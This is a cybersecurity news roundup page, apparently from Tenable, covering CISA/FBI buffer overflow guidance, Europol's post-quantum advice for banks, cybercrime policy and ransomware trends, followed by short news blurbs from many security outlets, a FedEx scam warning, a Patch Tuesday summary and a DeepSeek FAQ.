Check out best practices for preventing buffer overflow attacks. Plus, Europol offers best practices for banks to adopt quantum-resistant cryptography. Meanwhile, an informal Tenable poll looks at cloud security challenges. And get the latest on ransomware trends and on cybercrime legislation and prevention!Dive into six things that are top of mind for the week ending Feb. 14.1 - CISA, FBI offer buffer overflow prevention tipsThe U.S. government is urging software makers to adopt secure application-development practices that help prevent buffer overflow attacks.This week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) called buffer overflow vulnerabilities “unforgivable defects” that put national and economic security at risk.“CISA and FBI urge manufacturers to use proven prevention methods and mitigations to eliminate this class of defect while urging software customers to demand secure products from manufacturers that include these preventions,” the agencies wrote in a joint fact sheet. Buffer overflows happen when data written to a computer’s memory buffer exceeds the buffer’s capacity. This can lead to issues such as system crashes, data corruption and remote code execution.  These are some of the recommendations the agencies offered for preventing buffer overflows in the fact sheet titled “Malicious Cyber Actors Use Buffer Overflow Vulnerabilities to Compromise Software.”Use memory-safe languages when developing software.Implement compile time and runtime protections using compiler flags.Rigorously test your software products using static analysis, fuzzing and manual reviews throughout the development cycle.Analyze the root cause of past buffer overflow vulnerabilities to detect trends and patterns.CISA and the FBI also highlighted these buffer overflow vulnerabilities:CVE-2025-21333CVE-2025-0282CVE-2024-49138CVE-2024-38812CVE-2023-6549CVE-2022-0185For more information about buffer overflow attacks and vulnerabilities:“Buffer Overflow” (OWASP)“What is Buffer Overflow?” (Cybersecurity News)“How to mitigate buffer overflow vulnerabilities” (Infosec Institute)“How to prevent buffer overflow attacks” (TechTarget)VIDEOSWhat is a Buffer Overflow Attack? (TechTarget) Buffer Overflow Attacks Explained (Tech Sky) 2 - Europol to banks: Prepare for quantum computing threatFinancial institutions in Europe must get ready to face the cyberthreat that quantum computers will pose to data security and data privacy when these powerful systems become widely available.That’s the message from Europol’s new document “Quantum Safe Financial Forum - A call to action” which urges the European financial sector to prioritize adopting post-quantum cryptography.Here’s the problem: Quantum computers will be able to decrypt data protected with existing public-key cryptographic algorithms, which is why post-quantum algorithms are being developed, with several already available for use. Estimates about when these quantum computers will be ready range anywhere from five years to 15 years from now. However, the process for organizations to transition towards quantum-resistant cryptography will be lengthy and complicated. In addition to adopting post-quantum cryptography, banks and other financial institutions should take this opportunity to boost their cryptography management practices, according to Europol.However, the financial sector won’t be able to go through this journey unassisted. “Achieving this complex goal requires immediate action and a coordinated effort involving industry peers, vendors, policymakers, and society,” the document reads.Europol recommendations for adopting post-quantum cryptography include:To prioritize the shift to quantum-resistant cryptography, banks should update how they manage cryptography; train IT teams on cryptography; and allocate the required resources.To update cryptographic management, banks should, for example, integrate this practice into general IT asset management; inventory cryptographic assets; and implement policy compliance checks.Banks, governments, vendors and law enforcement agencies must collaborate, coordinate their efforts and share knowledge towards the common goal of securing data against quantum attacks.Regulators should refrain from creating new rules and instead focus on collaborating with the private sector on a set of common, consistent guidelines for quantum-safe cryptography.For more information about the threat from quantum computing:“Is Quantum Computing a Cybersecurity Threat?” (American Scientist)“Quantum and the Threat to Encryption” (SecurityWeek)“Quantum Computing Advances in 2024 Put Security In Spotlight” (Dark Reading)“Quantum computing could threaten cybersecurity measures. Here’s why – and how tech firms are responding” (World Economic Forum)“Quantum Computing–Quantifying the Current State of the Art to Assess Cybersecurity Threats” (MITRE)3 - A temperature check on cloud security challengesDuring this week’s webinar “How does an industry leader like Tenable protect its own cloud environments?,” we asked attendees about their main cloud security challenges. Check out how they responded.(Source: 138 webinar attendees polled by Tenable, February 2025)Interested in learning how Tenable’s security team uses Tenable Cloud Security to safeguard our cloud environments? Watch the on-demand webinar, in which Phillip Hayes, Tenable’s Director of Information Security, and Michael Garman, Tenable’s Senior Manager of Technology Engineering, discuss a variety of cloud security best practices.For more information about Tenable’s cybersecurity best practices, check out these Tenable blogs:""Establishing a Cloud Security Program: Best Practices and Lessons Learned"" ""How To Clean Up Your Cloud Environment Using Tenable Cloud Security"" ""Walking the Walk: How Tenable Embraces Its ""Secure by Design"" Pledge to CISA""""Strengthening the Nessus Software Supply Chain with SLSA""""Making Zero Trust Architecture Achievable""""Tenable’s Software Update Process Protects Customers’ Business Continuity with a Safe, Do-No-Harm Design""4 - Google: Curbing cybercrime requires international collaborationGovernments must understand that financially motivated cyberattacks impact not only their specific victims but also endanger national security, and as such merit heightened attention from the public sector.That’s a key takeaway from “Cybercrime: A Multifaceted National Security Threat,” a report released this week by Google’s Threat Intelligence Group.Although cybercrime accounts for a majority of malicious cyber activity, it gets short shrift from national security cyber defenders, who instead place most of their focus on state-backed groups, the report states.“While the threat from state-backed hacking is rightly understood to be severe, it should not be evaluated in isolation from financially motivated intrusions,” the authors wrote. “Financially motivated cyber intrusions, even those without any ties to state goals, harm national security. A single incident can be impactful enough on its own to have a severe consequence on the victim and disrupt citizens'' access to critical goods and services,” the report reads.So how can governments more effectively tackle national-security cyberthreats from profit-seeking cybercriminals? Here are some of Google’s recommendations for government policymakers globally:Raise cybercrime to a national security priority, including collecting and analyzing data on cybercrime groups; and boosting law enforcement’s capacity to fight cybercrime.Promote adoption of strong cyber defenses across all industries by, for example, incentivizing organizations to adopt security best practices.Deploy legal, technical and financial measures to dismantle the infrastructure supporting cybercrime operations.Strengthen international collaboration by sharing cyberthreat information, conducting joint investigations and taking coordinated actions against cybercrime networks.Enhance efforts to educate individuals and organizations about online safety, cyber best practices and cyber incident reporting.For more information about cybercrime trends:“Insider fraud and AI threats top forecasts of 2025 cybercrime” (American Banker)“Cybercrime Tactics and Demands Are Getting More Aggressive” (Bloomberg)“3 Cybercrime Trends Tech Pros Must Watch in 2025” (Dice)“UN General Assembly adopts milestone cybercrime treaty” (United Nations)“Major cybercrime crackdowns signal shift in global cybersecurity strategies” (The Conversation)5 - Bipartisan U.S. bill seeks tougher punishments for cybercrimesA bill introduced by two U.S. senators this week would update an existing computer crime law in order to dial up penalties for cybercrime conspiracies.Currently, the U.S. government charges suspects accused of conspiracies to commit cybercrimes under a general statute, instead of under the Computer Fraud and Abuse Act (CFAA).  While the maximum penalty under the general conspiracy statute is five years in prison, the new conspiracy charge that would be added to the CFAA via the “Cyber Conspiracy Modernization Act” could result in jail time ranging between 10 years to life imprisonment.“The ‘Cyber Conspiracy Modernization Act’ would amend the CFAA to create a specific penalty for the crime of conspiracy under the CFAA,” reads a statement from Sen. Mike Rounds (R-S.D.) who introduced the bill along with Sen. Kirsten Gillibrand (D-N.Y.)6 - Report: Global ransomware attacks up in 2024Ransomware attacks grew 15% worldwide last year, compared with 2023, as ransomware gangs showed a growing interest not just in encrypting data but in stealing it to further monetize it.That’s according to NCC Group’s “Cyber Threat Intelligence Annual Report 2024,” which also found that the industrials sector was the hardest hit, suffering 27% of ransomware attacks, a sign of ransomware groups'' focus on critical infrastructure organizations. A trend that developed last year was the increasing interest among ransomware gangs on swiping data, not just locking it up in exchange for payment. Why? Stealing data is “faster, easier and more profitable,” according to NCC Group.“Stolen information can be leveraged for extortion, fraud, identity theft, or even future breaches, making it a highly valuable commodity in the hands of cybercriminals,” reads the report.The 5,263 ransomware attacks observed by NCC Group in 2024 were the most since it started monitoring them in 2021. Despite getting hit by law enforcement operations, LockBit ranked first among ransomware groups with 10% of all attacks, followed by RansomHub.For more information about ransomware:“Ransomware: Predictions and Actions in 2025” (SC Magazine)""Stop Ransomware Guide"" (CISA)“New ransomware group Funksec is quickly gaining traction” (CSO)“Ransomware isn''t always about the money: Government spies have objectives, too” (The Register)“How ransomware attacks like Columbus'' happen” (Axios)

by Tenable

by ComputerWeekly

by ComputerWeekly

How we plan to unlock epic wins for our customers through innovation, strategic releases, and data-driven insights.

by Hack The Box Blog

Finding a trustworthy free VPN can be a real challenge. We tested the best free VPNs that offer solid services without invading your privacy.

by ZDNET Security

by CrowdStrike

CyberArk announces the Zilla deal on the same day leading identity service provider SailPoint returns to the public markets.

by Dark Reading

Cybersecurity experts weigh in on the red flags flying around the new Department of Government Efficiency''s handling of the mountains of US data it now has access to, potentially without basic information security protections in place.

by Dark Reading

Pivoting from prior cyber espionage, the threat group deployed its backdoor tool set to ultimately push out RA World malware, demanding $2 million from its victim.

by Dark Reading

Scammers are once again using AI to take over Gmail accounts.

by Malwarebytes Labs

A widespread phishing campaign has been observed leveraging bogus PDF documents hosted on the Webflow content delivery network (CDN) with an aim to steal credit card information and commit financial fraud. ""The attacker targets victims searching for documents on search engines, resulting in access to malicious PDF that contains a CAPTCHA image embedded with a phishing link, leading them to

by The Hacker News

In mid-March 2024, KrebsOnSecurity revealed that the founder of the personal data removal service Onerep also founded dozens of people-search companies. Shortly after that investigation was published, Mozilla said it would stop bundling Onerep with the Firefox browser and wind down its partnership. But nearly a year later, Mozilla is still promoting it to Firefox users.

by Krebs on Security

A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors. The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet

by The Hacker News

Hazel discusses Interpol’s push to rename pig butchering scams as ‘romance baiting’. Plus, catch up on the latest vulnerability research from Talos, and why a recent discovery is a “rare industry win”.

by Cisco Talos Blog

Barracuda is starting the year on a high note, with multiple new industry accolades that underscore our leadership in cybersecurity.

by Barracuda

Ever felt like your team is stuck in a constant battle? Developers rush to add new features, while security folks worry about vulnerabilities. What if you could bring both sides together without sacrificing one for the other? We invite you to our upcoming webinar, ""Opening the Fast Lane for Secure Deployments."" This isn’t another tech talk full of buzzwords—it''s a down-to-earth session that

by The Hacker News

BitLocker encryption is a great way to stop a thief from accessing your business and personal secrets. But don''t let the tool lock you out of your PC.

by ZDNET Security

An RA World ransomware attack in November 2024 targeting an unnamed Asian software and services company involved the use of a malicious tool exclusively used by China-based cyber espionage groups, raising the possibility that the threat actor may be moonlighting as a ransomware player in an individual capacity. ""During the attack in late 2024, the attacker deployed a distinct toolset that had

by The Hacker News

The gaming giant told affected users: ""Consider fully reformatting your operating system"" © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

GoPhish provides a nice platform for creating and running phishing campaigns. This blog will guide you through installing GoPhish and creating a campaign.  The post Gone Phishing: Installing GoPhish and Creating a Campaign appeared first on Black Hills Information Security.

by Black Hills Information Security

AI is everywhere now, transforming how businesses operate and how users engage with apps, devices, and services. A lot of applications now have some Artificial Intelligence inside, whether supporting a chat interface, intelligently analyzing data or matching user preferences. No question AI benefits users, but it also brings new security challenges, especially Identity-related security

by The Hacker News

By dynamically providing relevant information in real time, assorted AI applications can ease friction in collaborative workspaces.

by ITPro Today

SentinelOne warns that a phishing campaign is targeting high-profile X accounts, including those belonging to US political figures, leading journalists, major technology companies, cryptocurrency organizations, and owners of coveted usernames.

by KnowBe4

Italian company SIO, which sells to government customers, is behind an Android spyware campaign called Spyrtacus that spoofed popular apps like WhatsApp, per security researchers. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Palo Alto Networks has addressed a high-severity security flaw in its PAN-OS software that could result in an authentication bypass. The vulnerability, tracked as CVE-2025-0108, carries a CVSS score of 7.8 out of 10.0. The score, however, drops to 5.1 if access to the management interface is restricted to a jump box. ""An authentication bypass in the Palo Alto Networks PAN-OS software enables an

by The Hacker News

With investment in cybersecurity capabilities and proactive measures to address emerging challenges, we can work together to navigate the complexities of combating cybercrime.

by Dark Reading

Threat hunters have shed light on a new campaign targeting the foreign ministry of an unnamed South American nation with bespoke malware capable of granting remote access to infected hosts. The activity, detected in November 2024, has been attributed by Elastic Security Labs to a threat cluster it tracks as REF7707. Some of the other targets include a telecommunications entity and a university,

by The Hacker News

We look into the methods of hijacking WhatsApp and Telegram accounts, and ways to protect yourself against them.

by Kaspersky

We’re excited to announce the beta release of Automatic Audit Logs, offering greater transparency and control.

by Cloudflare

Artificial intelligence (AI) is now squarely on the frontlines of information security. However, as is often the case when the pace of technological innovation is very rapid, security often ends up being a secondary consideration. This is increasingly evident from the ad-hoc nature of many implementations, where organizations lack a clear strategy for responsible AI […] The post How red teaming helps safeguard the infrastructure behind AI models appeared first on Security Intelligence.

by Security Intelligence

Identity security company CyberArk has acquired identity governance and administration (IGA) platform Zilla Security in a deal worth up to $175 million. The transaction consists of a $165 million cash portion and an additional $10 million “earn-out” which is payable upon meeting certain milestones — it can be seen as an incentive for the founders […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Microsoft Azure provides administrators with controls to limit the actions a principal can take within the cloud environment. These actions can broadly be split into two categories: those that impact the Entra ID tenant and those that affect the Azure cloud subscription, the latter of which we will call “RBAC actions.” Prior research into Entra […] The post Azure RBAC Privilege Escalations: Azure VM appeared first on Praetorian.

by Praetorian

Hunters International is a ransomware group that emerged in October 2023, operating under a Ransomware-as-a-Service (RaaS) model. The group has been responsible for over 200 attacks worldwide, targeting various industries and exfiltrating sensitive data before encrypting systems. Hunters International uses a Rust-based ransomware that shares similarities with the Hive ransomware but incorporates improvements in command-line options, key management, and encryption techniques.

by Picus Security

0xM5awy thanks for the valuable content my friend. Cheers! 🥂

by HACKLIDO

APTs are sophisticated threat actors with the resources to coordinate and achieve long-term objectives. Amidst the skyrocketing numbers of BEC attacks, every organization should be worried about the ability of intruders to infiltrate and exploit. This blog will look at several recent examples of complex email attacks and how Darktrace / EMAIL successfully disarmed and prevented intrusion.

by Darktrace

by ComputerWeekly

The layoffs come soon after Sophos completed its $859 million acquisition of Secureworks. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

FedEx, the world''s largest express transportation company, is issuing an urgent public warning regarding a wave of FedEx scams that have recently emerged, particularly in India. These fraudulent activities, often involving the impersonation of FedEx employees, are leading victims into dangerous situations where they are tricked into transferring money and personal information under false pretenses.  With the rise of digital fraud, FedEx is emphasizing the importance of awareness and vigilance to avoid falling victim to these deceptive tactics. The company encourages everyone to be cautious, as these scams not only cause financial harm but can also result in emotional distress.  Understanding the FedEx Scams  The FedEx scams typically starts with a phone call or a text message from someone pretending to be a FedEx courier representative. The fraudster falsely claims that the recipient’s parcel contains illegal or prohibited items. This claim is often followed by a threatening message from an individual pretending to be a law enforcement official.  The fake officer will warn the recipient that legal action or even digital arrest will be pursued unless an immediate payment is made to clear the supposed charges. These scammers create a false sense of urgency, pressuring their victims to act quickly. Once the victim sends the money, the perpetrators vanish, leaving the individual with a financial loss and no recourse. Key Points to Remember  FedEx has notified users that the company will never ask for sensitive personal information, account details, or identity data via unsolicited mail, email, or text messages. The company has further clarified that it is not affiliated with any law enforcement agencies and does not act on their behalf to collect payments or resolve legal matters.  Customers are strongly urged to be wary of any unexpected communications that claim to represent FedEx or involve threats from fake law enforcement officials. The company also highlights the importance of never transferring money or sharing personal details when faced with unsolicited requests or threats of legal action.  What to Do If You’re Targeted  FedEx advises individuals who fall victim to such FedEx scams to report the incident immediately. Victims can reach out to the Cyber Crime Helpline by dialing 1930 or by visiting the official government website at cybercrime.gov.in. It is crucial to report these fraudulent activities as soon as possible in order to prevent further harm and assist law enforcement in tracking down the perpetrators.  FedEx provides a set of practical guidelines to help the public stay protected against these types of fraud:  Always be cautious of unsolicited communications, especially if they claim to be from FedEx or other courier companies.  Cross-check any suspicious phone calls, messages, or emails with official customer service channels. It''s always better to verify through legitimate sources before taking any action.  Never transfer money or share sensitive personal information without confirming the legitimacy of the request.  If you encounter a potential FedEx scam, contact local law enforcement or report the incident via the Cyber Crime Helpline in 1930 or on cybercrime.gov.in.  Conclusion  As fraudulent activities continue to target victims, staying vigilant and informed is essential to protecting personal information and preventing fraud. To help consumers recognize and avoid scams, FedEx encourages individuals to visit their website or contact customer service for guidance. By adhering to safety tips and promptly reporting any suspicious activity, the public can play a crucial role in preventing these scams and securing themselves against fraudulent activities worldwide. 

by The Cyber Express

Despite software''s global reach, many companies overlook a critical aspect of their development process: localization for non-traditional markets.

by ITPro Today

Penetration testing has long been a core practice in cybersecurity, but the way that organizations conduct these assessments is changing. In a recent webinar featuring cybersecurity expert Hector Monsegur, we discussed a critical shift: how combining automated penetration testing with attack path mapping and validation can elevate security operations. 

by Picus Security

Watch this tutorial to learn about handling drive mappings in PowerShell, focusing on fixing inaccessible network drives in elevated sessions.

by ITPro Today

Variston, a Barcelona-based spyware vendor, has reportedly shut down. Intelligence Online, a trade publication that covers the surveillance and intelligence industry, reports that a legal notice published in Barcelona’s registry on February 10 confirmed that Variston has been liquidated. TechCrunch has also seen the legal notice saying Variston has shuttered. This comes almost a year […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

A guide to understanding the security-related implications of the EU Cyber Resilience Act.

by Hack The Box Blog

The agencies are urging manufacturers to shift development practices through the use of memory safe code.

by Cybersecurity Dive

Romance scams cost victims hundreds of millions of dollars a year. As people grow increasingly isolated, and generative AI helps scammers scale their crimes, the problem could get worse.

by WIRED Security News

In 2024, Barracuda Managed XDR logged many trillions of IT events to identify the critical security threats targeting organizations and neutralize malicious activity. Threat analysts in Barracuda Managed XDR’s Security Operations Center (SOC) have drawn on this unique dataset to highlight the most common ways threat actors tried — and ultimately failed — to breach and disrupt targets in 2024.

by Barracuda

Salt Typhoon threat actors compromised Cisco edge devices by exploiting older vulnerabilities.

by Cybersecurity Dive

Recent analyses reveal that government-backed hacking groups are increasingly adopting ransomware techniques, not solely for financial gain but also to further their espionage objectives. This trend blurs the lines between traditional cybercriminals and state-sponsored actors, complicating attribution and defense efforts. The post Nation-State Actors Increasingly Employ Ransomware Tactics appeared first on ZENDATA Cybersecurity.

by Zendata

Some detectors are better at spotting AI-written text than others. Here''s why these mixed results matter.

by ZDNET Security

Threat intelligence firm Recorded Future said it had observed Salt Typhoon breaching 5 telcos between December 2024 and January 2025. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The open-source LLM known as DeepSeek has attracted much attention in recent weeks with the release of DeepSeek V3 and DeepSeek R1, and in this blog, The Tenable Security Response Team answers some of the frequently asked questions (FAQ) about it.BackgroundThe Tenable Security Response Team (SRT) has compiled this blog to answer Frequently Asked Questions (FAQ) regarding DeepSeek.FAQWhat is DeepSeek?DeepSeek typically refers to the large language model (LLM) produced by a Chinese company named DeepSeek, founded in 2023 by Liang Wenfeng.What is a large language model?A large language model, or LLM, is a machine-learning model that has been pre-trained on a large corpus of data, which enables it to respond to user inputs using natural, human-like responses.Why is there so much interest in the DeepSeek LLM?In January 2025, DeepSeek published two new LLMs: DeepSeek V3 and DeepSeek R1. The interest surrounding these models is two-fold: first, they are open-source, meaning anyone can download and run these LLMs on their local machines and, second, they were reportedly trained using less-powerful hardware, which was believed to be a breakthrough in this space as it revealed that such models could be developed at a lower cost.What are the differences between DeepSeek V3 and DeepSeek R1?DeepSeek V3 is an LLM that employs a technique called mixture-of-experts (MoE) which requires less compute power because it only loads the required “experts” to respond to a prompt. It also implements a new technique called multi-head latent attention (MLA), which significantly reduces the memory usage and performance during training and inference (the process of generating a response from user input).In addition to MoE and MLA, DeepSeek R1 implements a multitoken prediction (MTP) architecture first introduced by Meta. Instead of just predicting the next word each time the model is executed, DeepSeek R1 predicts the next two tokens in parallel.DeepSeek R1 is an advanced LLM that utilizes reasoning, which includes chain-of-thought (CoT), revealing to the end user how it responds to each prompt. According to DeepSeek, performance of its R1 model “rivals” OpenAI’s o1 model.Example of DeepSeek’s chain-of-thought (CoT) reasoning modelWhat are the minimum requirements to run a DeepSeek model locally?It depends. DeepSeek R1 has 671 billion parameters and requires multiple expensive high-end GPUs to run. There are distilled versions of the model starting at 1.5 billion parameters, going all the way up to 70 billion parameters. These distilled models are able to run on consumer-grade hardware. Here is the size on disk for each model:DeepSeek R1 modelsSize on disk1.5b1.1 GB7b4.4 GB8b4.9 GB14b9.0 GB32b22 GB70b43 GB671b404 GBTherefore, the lower the parameters, the less resources are required and the higher the parameters, the more resources are required.The number of parameters also influences how the model will respond to prompts by the user. Most modern computers, including laptops that have 8 to 16 gigabytes of RAM, are capable of running distilled LLMs with 7 billion or 8 billion parameters.What makes DeepSeek different from other LLMs?Benchmark testing conducted by DeepSeek showed that its DeepSeek R1 model is on par with many of the existing models from OpenAI, Claude and Meta at the time of its release. Additionally, many of the companies in this space have not open-sourced their frontier LLMs, which gives DeepSeek a unique advantage.Finally, its CoT approach is verbose, revealing more of the nuances involved in how LLMs respond to prompts compared to other reasoning models. The latest models from OpenAI (o3) and Google (Gemini 2.0 Flash Thinking) reveal additional reasoning to the end user, though in a less verbose fashion.What is a frontier model?A frontier model refers to the most advanced LLMs available that include complex reasoning and problem-solving capabilities. Currently, OpenAI’s o1 and o3 models along with DeepSeek R1 are the only frontier models available.DeepSeek was created by a Chinese company. Is it safe to use?It depends. Deploying the open-source version of DeepSeek on a system is likely safer to use versus DeepSeek’s website or mobile applications, since it doesn’t require a connection to the internet to function. However, there are genuine privacy and security concerns about using DeepSeek, specifically through its website and its mobile applications available on iOS and Android.What are the concerns surrounding using DeepSeek’s website and mobile applications?DeepSeek''s data collection disclosure is outlined in its privacy policy, which specifies the types of data collected when using its website or mobile applications. It''s important to note that data is stored on secure servers in the People''s Republic of China, although the retention terms are unclear. Since DeepSeek operates in China, its terms of service are subject to Chinese law, meaning that consumer privacy protections, such as the EU’s GDPR and similar global regulations, do not apply. If you choose to download DeepSeek models and run them locally, you face a lower risk regarding data privacy.Has DeepSeek been banned anywhere or is it being reviewed for a potential ban?As of February 13, several countries have banned or are investigating DeepSeek for a potential ban, including Italy, Taiwan, South Korea and Australia, as well as several states in the U.S. have banned DeepSeek from government devices including Texas, New York, Virginia along with several entities of the U.S. federal government including the U.S. Department of Defense, U.S. Navy and the U.S. Congress. This list is likely to continue to grow in the coming weeks and months.Is Tenable looking into safety and security concerns surrounding LLMs like DeepSeek?Yes, Tenable Research is actively researching LLMs, including DeepSeek, and will be sharing more of our findings in future publications on the Tenable blog.Get more informationDeepSeek-R1: Incentivizing Reasoning Capability in LLMs via Reinforcement LearningJoin Tenable''s Security Response Team on the Tenable Community.Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

by Tenable

Quantum computing is poised to revolutionize industries by solving complex problems at speeds far beyond classical computers. While the potential benefits are immense, this technology also poses significant risks to current cryptographic systems that protect global digital infrastructure.

by Sectigo

by ComputerWeekly

Despite high-profile attention and even US sanctions, the group hasn’t stopped or even slowed its operation, including the breach of two more US telecoms.

by WIRED Security News

Japan is on a mission to catch up to the US standard of national cyber preparedness, and its new legislation is a measure intended to stop escalating Chinese cyber-espionage efforts, experts say.

by Dark Reading

by CrowdStrike

by CrowdStrike

During a recent investigation (REF7707), Elastic Security Labs discovered new malware targeting a foreign ministry. The malware includes a custom loader and backdoor with many features including using Microsoft’s Graph API for C2 communications.

by Elastic Security Lab

REF7707 targeted a South American foreign ministry using novel malware families. Inconsistent evasion tactics and operational security missteps exposed additional adversary-owned infrastructure.

by Elastic Security Lab

Discover the latest threat intelligence outlooks for 2025, including AI-enabled phishing, SaaS attacks, and executive-targeted cyber threats. Learn key strategies to protect your organization from evolving digital risks.

by Recorded Future

Explore intelligence reports from Recorded Future''s Insikt Group at the 2025 Munich Security Conference. Key topics include Taiwan invasion risk, Russian influence in German elections, RedMike exploiting Cisco devices, and North Korea’s IT worker scam.

by Recorded Future

Discover how Russia-linked influence operations, including Doppelgänger and Operation Overload, are attempting to undermine Germany''s 2025 elections. Learn about their tactics, impacts, and how to mitigate the risks to media integrity and public trust.

by Recorded Future

Discover how Chinese state-sponsored group RedMike exploited unpatched Cisco devices, targeting telecommunications providers globally. Learn about vulnerabilities CVE-2023-20198 and CVE-2023-20273, and how organizations can protect critical infrastructure.

by Recorded Future

Learn how North Korea’s IT workers infiltrate global companies, posing cybersecurity threats, committing fraud, and supporting the regime. Discover key findings and mitigation strategies to safeguard your business.

by Recorded Future

Sean Cairncross will be one of the primary advisers to the administration on national cybersecurity matters.

by Dark Reading

A subgroup within the infamous Russian state-sponsored hacking group known as Sandworm has been attributed to a multi-year initial access operation dubbed BadPilot that stretched across the globe. ""This subgroup has conducted globally diverse compromises of Internet-facing infrastructure to enable Seashell Blizzard to persist on high-value targets and support tailored network operations,"" the

by The Hacker News

This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.A PowerShell function is a block of code designed to perform a specific task. Once a function is created and tested, it can be used in multiple scripts, reducing coding effort and risk of errors. Using well-named functions also makes scripts easier to read and maintain. And since functions can return values that can be … Continued

by Netwrix

The open technology, which tackles disinformation, has gained steam in the past year, surpassing 500 corporate members and continuing to evolve.

by Dark Reading

Check out this FAQ-style blog on questions we received about Malware Detection for Barracuda Cloud-to-Cloud Backup at our recent webinar.

by Barracuda

Cybersecurity researchers have discovered a bypass for a now-patched security vulnerability in the NVIDIA Container Toolkit that could be exploited to break out of a container''s isolation protections and gain complete access to the underlying host. The new vulnerability is being tracked as CVE-2025-23359 (CVSS score: 8.3). It affects the following versions - NVIDIA Container Toolkit (All

by The Hacker News

US, UK, and Australian law enforcement have targeted a company called Zservers (and two of its administrators) for providing bulletproof hosting services to the infamous ransomware gang.

by Dark Reading

During the suspension of the Azerbaijan delegation, anti-PACE narratives spread both domestically and internationally The post Domestic and international campaigns targeted PACE during Azerbaijan’s 2024 suspension appeared first on DFRLab.

by DFRLab

As National Apprenticeship Week shines a spotlight on career development opportunities, it’s important to acknowledge that traditional apprenticeships aren’t the only route into the cybersecurity industry. With cyber threats growing exponentially, the demand for skilled professionals has never been higher. Fortunately, alternative training programs, such as academies, internships, and specialised upskilling initiatives, are providing essential […] The post National Apprenticeship Week: Alternative Routes into Cyber appeared first on IT Security Guru.

by IT Security Guru

Drata, a security compliance automation platform that helps companies adhere to frameworks such as SOC 2 and GDPR, has acquired software security review startup SafeBase for $250 million. SafeBase co-founders Al Yang (CEO) and Adar Arnon (CTO) will retain their roles, and SafeBase will continue to offer a stand-alone product while bringing its core solutions to […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Microsoft’s Patch Tuesday for February 2025 fixes four zero-day vulnerabilities, including two under active attack, plus another eight flaws judged to be at high risk of attack. In all, the Patch Tuesday February 2025 release note lists 63 Microsoft CVEs and four non-Microsoft CVEs, three of which are for Chromium-based Microsoft Edge. The highest-rated vulnerability, CVE-2025-21198, a 9.0-severity Microsoft High Performance Compute (HPC) Pack Remote Code Execution vulnerability, was judged to be at lower risk for exploitation because it requires network access. After January’s record 159 vulnerabilities, which included eight zero days and another 17 vulnerabilities at risk of exploitation, the February 2025 Patch Tuesday list seemed like something of a break in comparison. Microsoft Zero-Days Under Attack The actively exploited vulnerabilities include CVE-2025-21391, a Windows Storage Elevation of Privilege Vulnerability, and CVE-2025-21418, Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability. CVE-2025-21391 is a 7.1-rated Link Following vulnerability that doesn’t allow disclosure of confidential information, but Microsoft said an attacker could delete data that that results in the service being unavailable. No further information was released on the vulnerability. CVE-2025-21418 is a 7.8-severity Heap-based Buffer Overflow vulnerability that could allow an attacker to gain system privileges. It was disclosed anonymously. The other zero days revealed by Microsoft include CVE-2025-21194, a 7.1-rated Microsoft Surface Security Feature Bypass vulnerability that requires multiple conditions for exploitation; and CVE-2025-21377, a 6.5-severity NTLM Hash Disclosure Spoofing vulnerability. The Surface vulnerability was rated as less likely to be exploited, while the NTLM flaw was rated “Exploitation More Likely.” Patch Tuesday February 2025 Vulnerabilities at High Risk of Attack In addition to the three zero days actively under attack or at risk of attack, an additional eight vulnerabilities were rated as “Exploitation More Likely.” The eight range in severity from 7.0 to 8.1 on the CVSS v3.1 scoring system. They include: CVE-2025-21419, a Windows Setup Files Cleanup Elevation of Privilege vulnerability CVE-2025-21420, a Windows Disk Cleanup Tool Elevation of Privilege vulnerability CVE-2025-21400, an 8.0-rated Microsoft SharePoint Server Remote Code Execution vulnerability CVE-2025-21414, CVE-2025-21184, and CVE-2025-21358, all of which are Windows Core Messaging Elevation of Privileges vulnerabilities that could allow an attacker to gain system privileges CVE-2025-21367, a Windows Win32 Kernel Subsystem Elevation of Privilege vulnerability CVE-2025-21376, an 8.1-rated Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution vulnerability. Other Vendors Issuing Patch Tuesday Updates Patch Tuesday isn’t just for Microsoft, of course, as several other vendors also released updates. A partial list includes: Adobe Apple AMD Android Fortinet Ivanti Palo Alto Networks SAP SolarWinds  

by The Cyber Express

Executive Summary A recent investigation by Sucuri uncovered a sophisticated credit card skimmer on a Magento-based eCommerce website, leveraging Google Tag Manager (GTM) to inject malicious JavaScript and steal payment details. The malware was hidden within the cms_block.content database table, allowing attackers to discreetly intercept checkout page transactions. Further analysis by Sucuri revealed a backdoor in the...

by RH-ISAC

The latest updates resolve more glitches and security flaws - some critical - in Windows 11 23H2 and 24H2, so you''ll want to install them sooner rather than later.

by ZDNET Security

The parental control app just added several new features to help you keep your kids safer.

by ZDNET Security

Sandworm (aka Seashell Blizzard) has an initial access wing called "BadPilot" that uses standard intrusion tactics to spread Russia''s tendrils around the world.

by Dark Reading

A team Microsoft calls BadPilot is acting as Sandworm''s “initial access operation,” the company says. And over the last year it''s trained its sights on the US, the UK, Canada, and Australia.

by WIRED Security News

VIENNA, VA (January 21, 2025) – The Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC) has released the full agenda for its upcoming annual Cyber Intelligence Summit, the premier event for cybersecurity professionals working in retail, hospitality, and other consumer-facing industries. Scheduled to take place on 7-9 April in St. Louis, Missouri, the conference...

by RH-ISAC

CISOs are finding themselves more involved in AI teams, often leading the cross-functional effort and AI strategy. But there aren’t many resources to guide them on what their role should look like or what they should bring to these meetings.  We’ve pulled together a framework for security leaders to help push AI teams and committees further in their AI adoption—providing them with the

by The Hacker News

